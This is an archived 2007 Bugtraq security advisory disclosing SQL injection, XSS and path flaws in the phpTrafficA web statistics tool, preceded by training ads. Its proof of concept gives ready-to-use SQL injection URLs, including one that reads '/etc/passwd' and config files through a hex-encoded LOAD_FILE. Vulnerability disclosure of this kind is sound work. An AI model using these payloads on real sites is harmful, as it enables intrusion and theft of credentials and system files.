Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]

phpTrafficA < 1.4.2

Subject: phpTrafficA < 1.4.2
Date: 24 Jun 2007 17:56:56 -0000
Application: phpTrafficA < 1.4.2
Web Site: http://soft.zoneo.net/phpTrafficA/
Versions: all
Platform: linux, windows
Bug: injection sql , xss , full path



-------------------------------------------------------

1) Introduction
2) Bug
3) Proof of concept
4) Credits

===========
1) Introduction
===========

"phpTrafficA is a GPL statistical tool for web traffic analysis, written in php 
and mySQL. 
It can track access counts to your website, search engines, keywords, and 
referrers that lead to you, 
operating systems, web browsers, visitor retention, path analysis, and a lot 
more!"

======
2) Bug
======

injection sql, xss, full path



=====
3)proof of concept
=====


exemple of exploitation :
1)http://site.com/index.php?mode=stats&sid=THE_WEB_SITE_SID_HERE&show=page&pageid=-32+union+select+1,@@version/*

2)http://site.com/index.php?mode=stats&sid=THE_WEB_SITE_SID_HERE&show=page&pageid=-32+union+select+1,LOAD_FILE(0x2F6574632F706173737764)/*
--> load some file as /etc/passwd or /path/www/stats/Php/config_sql.php
( if magic_quote_gpc is disable you can do some into dumpfile tricks ..)

//?lang= is also vulnerable to xss attacks, and as Hamid Ebadi has mention 
$lang is also vulnerable to directory transversal

=====
4)Credits 
=====

laurent gaffie
contact : laurent.gaffie@gmail.com

<Prev in Thread] Current Thread [Next in Thread>
  • phpTrafficA < 1.4.2, laurent . gaffie <=